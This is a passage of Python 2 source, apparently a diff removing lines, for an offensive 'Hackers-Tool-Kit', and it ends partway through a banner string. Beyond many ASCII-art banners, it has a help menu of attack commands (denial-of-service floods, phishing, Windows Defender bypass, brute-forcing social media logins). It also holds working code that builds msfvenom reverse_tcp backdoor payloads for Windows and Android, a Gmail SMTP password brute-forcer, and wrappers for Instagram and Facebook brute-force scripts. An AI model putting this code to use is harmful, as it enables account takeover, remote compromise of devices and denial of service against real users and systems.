▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,18) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | 